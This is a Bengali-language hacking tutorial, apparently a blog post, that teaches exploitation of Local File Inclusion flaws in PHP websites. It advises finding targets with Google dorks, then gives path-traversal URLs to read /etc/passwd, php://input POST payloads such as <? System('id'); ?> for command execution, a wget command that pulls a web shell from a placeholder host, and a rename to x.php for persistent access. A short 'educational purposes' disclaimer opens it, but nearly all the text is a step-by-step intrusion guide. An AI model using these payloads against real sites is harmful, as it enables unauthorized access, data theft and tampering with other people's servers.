(টিউটোরিয়ালটি শুধুমাত্র শিক্ষনীয় উদ্দ্যেশ্যে লেখা)

আজকের টিউটোরিয়ালে আমরা এলএফআই হ্যাকিং সম্পর্কে জানবো।এবং কিভাবে এক্সপ্লইট করতে হয় সেটা শিখবো

এলএফআই Vulnerability কিঃ

সোজা ভাষায় বলতে গেলে কোনো স্ক্রিপ্টে বা সাইটে এলএফআই Vulnerability  থাকলে । সেই সাইটে কিছু নির্দিষ্ট কোড এক্সিকিউট করলে। সেই সাইটের স্পর্শকাতর তথ্য সমূহ আপনি আপনার ওয়েবপেইজে দেখতে পাবেন ।

এলএফআই

এলএফআই

কোড রান করাবেন কিভাবে ?

আপনি যে সাইটে এলএফআই দুর্বলতা পাবেন ।সেই সাইটের এড্রেসের শেষে আপনি কিছু নির্দিষ্ট কোডের মাধ্যমে সাইটি এক্সপ্লইট করতে পারবেন । এমনকি সাইটটিতে শেল আপলোড করে সাইটের যে কোনো ডাটা এডিট,ডিলেট

এবং আপনার নিজের পেইজ,স্ক্রিপ্ট আপলোড দিতে পারবেন।

কিভাবে এলএফআই Vulnerable Site বের করবেন?

প্রথমেই আপনার যদি কোনো টার্গেট সাইট না থাকে তাহলে গুগল Dork ব্যাবহার করে আপনি ( এলএফআই ) LFI Vulnerable সাইট বের করতে পারেন । আর টার্গেট সাইট থাকলে স্ক্যানারের মাধ্যমে আপনি সেই সাইটের ( এলএফআই ) LFI Vulnerability পেলে আপনি কাজ করা শূরু করে দিতে পারেন ( এলএফআই ) LFI Vulnerability নিয়ে। যায় হোক এই সব ব্যাপার বিস্তারিতবলার কোনো দরকার নাই। আশা করি আপনার নিজ মাথা খাটিয়ে ব্যাপার গুলো বুঝে নিবেন।

এলএফআই

এলএফআই (1)

কিভাবে ( এলএফআই ) LFI Vulnerability চেক করবেন :

বেশীর ভাগ ( এলএফআই )  LFI Vulnerability চেক করার জন্যে আপনি নির্দিষ্ট কিছু কোড ব্যাবহার করতে পারেন।

আর ( এলএফআই ) LFI Vulnerable Site এর লিঙ্ক হয় এরকমঃ

Examplelfi.com/index.php?page=

 

এর মানে এই নয় যে এই ধরনের যত সাইট আছে সব সাইট ( এলএফআই ) LFI Vulnerable!

যায় হোক । এখন আমি টেস্ট করবো এই সাইট ভুলনরাবল কিনা!

আমি একটি কোড রান করাবো এই লিঙ্ক এর = এর পর দেখি ওয়েবব্রাউজার আমাকে কি দেখায় ।

Examplelfi.com/index.php?page=../../../../../../../../../etc/passwd

 

আমি এই ধরনের রেসাল্ট দেখতে পেলাম

ছবিঃ

http://i.share.pho.to/b3506346_o.png

 এবার আমরা আরেকটি কোড এক্সিকিউট করার পর দেখি সেটার রেসাল্ট কি আসে

কোডটি হচ্ছে:

/proc/self/environ

উদাহারণ দেখুনঃ

Examplelfi.com/index.php?page=/proc/self/environ

 

কিছুই দেখাচ্ছে না:

http://i.share.pho.to/76f5f4e7_o.png

যায় হোক আবার আমরা কিছু  PHP ডাটা ইনপুট করার চেষ্টা করবো ডাটা পোস্ট মেথড ব্যাবহার করে  যার জন্যে দরকার  হবে হ্যাকবার ।

এটা মোজিলা ফায়ারফক্সের একটি এডঅন, এবং হ্যাকারদের অত্যন্ত কাজের জিনিস।

এখন আমরা আমাদের টার্গেট সাইট একটা কমান্ড এক্সিকিউট করে আরো কিছু ইনফরমেশন পাওয়ার চেষ্টা করি।

নিচের ছবিটিতে লক্ষ্য করুন এখানে আমি কমান্ড ব্যাবহার করেছি এভাবেঃ

Examplelfi.com/index.php?page=php://input

এবং হ্যাকবারের নিচে Enable Post ডাটা নামে একটা অপশন আছে তার পাশে টিক চিহ্ন টি টিক করে করে দিলে নিচে আরেকটি বক্স ওপেন হবে যেটা দিয়ে ডাটা পোস্ট করা যায়

এবং সেখানে আমি কমান্ড দিলামঃ

<? System(‘id’); ?>

এই কমান্ড এক্সিকিউট করার পর কি রেসাল্ট আসছে সেটা একটু দেখি আসেন

ওয়েব সার্ভার রিলিটেড তথ্য

http://i.share.pho.to/4d0c0a62_o.png

এখন আসুন দেখি এই ডাইরেক্টরি তে কি কি ফাইল আছে

তার জন্যে কমান্ড হবে এরকম হ্যাকবারের এড্রেস লেখার জায়গায় এড্রেসটি আগের মতন থাকবে শুধু মাত্র পোস্ট ডাটার জায়গায় যে কমান্ডটি লেখেছিলাম তার মধ্যে সামন্য পরিবর্তন আসবে ।

এড্রেস থাকবে আগের মতনঃ

Examplelfi.com/index.php?page=php://input

এবং পোস্ট ডাটা বক্সে কমান্ড হবে

<? System(‘ls’); ?>

এই কমান্ডটি এক্সিকিউট করার পর ঐ ডাইরেক্টরি তে কি কি ফাইল আছে সেটা দেখাবে !

যায় হোক এই কমান্ডটি মনে রাখুন কারণ এটা শেষের দিকে দরকার হবে।

চলুন আবার তাহলে আসল কাজটা করেই ফেলি

শেল আপলোডের কাজ।

সেটাও করবো পোস্ট ডাটার মাধ্যমে ।। তার আগে আপনি গুগল থেকে বের করুন কোনো শেল হোস্ট করা আছে এমন কোনো ওয়েবসাইট, শেলটি টেক্সট ফরম্যাটে থাকলেই চলবে।

(বিস্তারিত দেখানো সম্ভব না :P)

এখন মনে করুন আপনার হোস্ট করা শেলটির লিঙ্ক এরকমঃ

http://yourshell.com/sh3ll.txt

এখন আমরা কমান্ড এক্সিকিউট করবো পোস্ট ডাটা বক্সটি ব্যাবহার করে। কিভাবে?

এড্রেস বক্সে থাকবে এই এড্রেসঃ

Examplelfi.com/index.php?page=php://input

এবং পোস্ট ডাটা বক্সে কমান্ড হবেঃ

<? System(‘wget http://yourshell.com/sh3ll.txt’); ?>

এইবার এক্সিকিউট করুন হ্যাকবারের মাধ্যমে এই কমান্ড J

ব্লাঙ্ক পেইজ দেখতে পাবেন রেসাল্টে !

এইবার একটা কমান্ড মনে রাখতে বলেছিলাম আগে

সেটা খেয়াল আছে তো ?

সেই কমান্ডটি হচ্ছেঃ

<? System(‘ls’); ?>

এখন যে ডাইরেক্টরিতে শেল আপলোড দিয়েছি সেই ডাইরেক্টরিতে শেলটি কিনামে সেভ হয়েছে সেটা দেখতে পাবো।

এছাড়াও ঐ ডাইরেক্টরির অন্য ফাইল গুলোর নাম ও দেখাবে কিন্তু আপনার আপলোড করা শেলের নাম দেখলেয় আপনি বুঝতে পারবেন কোনটা আপনার শেল! মনে করেন আমারটার নাম দেখতে পেলাম Sh3ll.txt

যায় হোক এইবার হচ্ছে রিনেম করার পালা।

আমরা আপলোড করা শেলটি রিনেম করবো । এবং টেক্সট ফরম্যাট থেকে পিএইচপি তে নিয়ে যাবো!

যার জন্যে আবার পোস্ট বক্সে কমান্ড লেখুন।

<? System(‘mv sh3ll.txt x.php’); ?>

কাজ শেষ J

এখন শেলের লিঙ্ক হবে: Examplelfi.com/x.php

আজকের টিউটোরিয়াল এখানেই শেষ আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন ।

SQLi নিয়ে আরো কয়েকটি টিউটোরিয়াল লেখবো। তবে এর পরের টিউটোরিয়ালে হ্যাশ থেকে কিভাবে পাসওয়ার্ড বের করা যায় এবং শেল আপলোডিং নিয়ে লেখার চেষ্টা করবো।